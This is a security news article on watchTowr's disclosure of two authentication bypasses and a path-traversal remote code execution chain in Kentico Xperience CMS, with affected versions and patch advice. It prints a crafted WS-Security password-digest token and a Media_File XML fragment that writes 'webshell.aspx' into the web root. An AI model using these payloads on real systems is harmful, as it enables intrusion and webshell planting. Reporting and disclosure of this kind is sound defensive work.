Cyber Security News

Kentico Xperience CMS Vulnerability Enables Remote Code Execution

In recent security research, vulnerabilities in the Kentico Xperience CMS have come to light, highlighting significant risks for users who rely on this Content Management System (CMS).

Specifically, two primary issues were identified: an Authentication Bypass vulnerability and a Post-Authentication Remote Code Execution (RCE) vulnerability.

These vulnerabilities, collectively forming a powerful exploit chain, allow attackers to gain full control over the CMS.

Kentico Xperience is a popular enterprise-level CMS written in C#, widely used by large businesses. Despite its widespread adoption, the CMS had a surprisingly low number of critical vulnerabilities reported before this discovery.

This lack of reported vulnerabilities by WatchTowr Labs, coupled with the valuable data it manages, makes Kentico an attractive target for attackers.

Authentication Bypass Vulnerability (WT-2025-0006)

The first vulnerability, WT-2025-0006, was an Authentication Bypass affecting versions before Kentico Xperience 13.0.173.

This vulnerability exploits the Staging Service API, which is not enabled by default but is common in configurations where users opt for username/password authentication instead of X.509-based authentication.

To exploit this vulnerability, attackers target the CMS.Synchronization.WSE3.SyncServer service, which uses WS-Security to secure SOAP requests.

Specifically, the Microsoft.Web.Services3.Security.Tokens.UsernameTokenManager class is involved in verifying password tokens.

However, when an invalid username is provided, the authentication process returns an empty string instead of throwing an exception.

Although directly sending an empty password is blocked by validation checks, attackers can bypass authentication by using a hashed password verification mechanism (PasswordDigest).

By manipulating the Nonce and Timestamp, an attacker can craft a valid authentication token, exploiting the fact that an empty password (when hashed) can be used.

<wsse:UsernameToken>
  <wsse:Username>watchTowr</wsse:Username>
  <wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OZ/c8o7h3mtigow7HXu0f+BUgLk=</wsse:Password>
  <wsse:Nonce>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM=</wsse:Nonce>
  <wsu:Created>2025-01-01T03:34:56Z</wsu:Created>
</wsse:UsernameToken>

Post-Authentication Remote Code Execution (WT-2025-0007)

After bypassing authentication, attackers can leverage the ProcessSynchronizationTaskData method in the Staging API to perform RCE. This method deserializes StagingTaskData using SoapFormatter, which is hardened but still powerful enough for exploitation.

The vulnerability lies in the ability to create or update objects within Kentico, notably media files. By manipulating the TaskData XML payload, an attacker can exploit a path traversal vulnerability to write files to arbitrary locations.

Specifically, by setting the FilePath in Media_File to a path outside the intended media library, such as ../../../../../../../../inetpub/wwwroot/Kentico13/CMS/CMSPages/, attackers can upload executable files to achieve RCE.

<Media_File>
  <FileID>1</FileID>
  <FileName>webshell.aspx</FileName>
  <FileExtension>.aspx</FileExtension>
  <FilePath>../../../../../../../../inetpub/wwwroot/Kentico13/CMS/CMSPages/</FilePath>
  <FileSize>20</FileSize>
  <FileGUID>993e29f9-086b-4110-872f-5cff26968a7b</FileGUID>
</Media_File>

Additional Authentication Bypass (WT-2025-0011)

Another Authentication Bypass vulnerability was discovered in WSE3’s VerifyPassword method.

When the Password Option is SendNone, no password validation is performed, allowing authentication bypass simply by providing a valid username without a password.

This exploit required providing a valid username for versions between 13.0.173 and 13.0.177, but potentially vulnerable to brute-forcing common usernames like “admin.”

Kentico addressed the first Authentication Bypass (WT-2025-0006) in version 13.0.173 by modifying the AuthenticateToken method to throw an exception on invalid usernames.

However, the Post-Auth RCE vulnerability remained unpatched until version 13.0.178.

Affected Product Table

Vulnerability IDVulnerability TypeDescriptionAffected VersionsCVE
WT-2025-0006Authentication BypassAllows authentication bypass by manipulating WS-Security tokens.Prior to Kentico Xperience 13.0.173None
WT-2025-0007Post-Authentication RCEEnables remote code execution after initial authentication bypass.Prior to 13.0.178 (for full patch)None
WT-2025-0011Authentication BypassAdditional bypass vulnerability resolved in 13.0.178.Prior to 13.0.178None

Recommendations:

  • Update Kentico Xperience CMS to the latest version to ensure you have the necessary patches.
  • Disable the Staging Service if not needed, or switch to X.509 authentication.
  • Monitor CMS configurations for unexpected changes or suspicious activity.

Detection scripts for these vulnerabilities are available on GitHub to help security teams verify if their instances are vulnerable.

The vulnerabilities identified in Kentico Xperience CMS underscore the importance of continuous security monitoring and updates.

By chaining these vulnerabilities, attackers can achieve full control over affected systems, highlighting the need for proactive security measures and vendor engagement.

The rapid response from Kentico demonstrates the value of responsible disclosure and patching in mitigating such threats.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free. 

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…

2 days ago

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code execution…

2 days ago

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…

2 days ago

Hackers Target macOS Users with Fake Ledger Apps to Deploy Malware

Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…

2 days ago

EU Targets Stark Industries in Cyberattack Sanctions Crackdown

The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…

2 days ago

Venice.ai’s Unrestricted Access Sparks Concerns Over AI-Driven Cyber Threats

Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…

2 days ago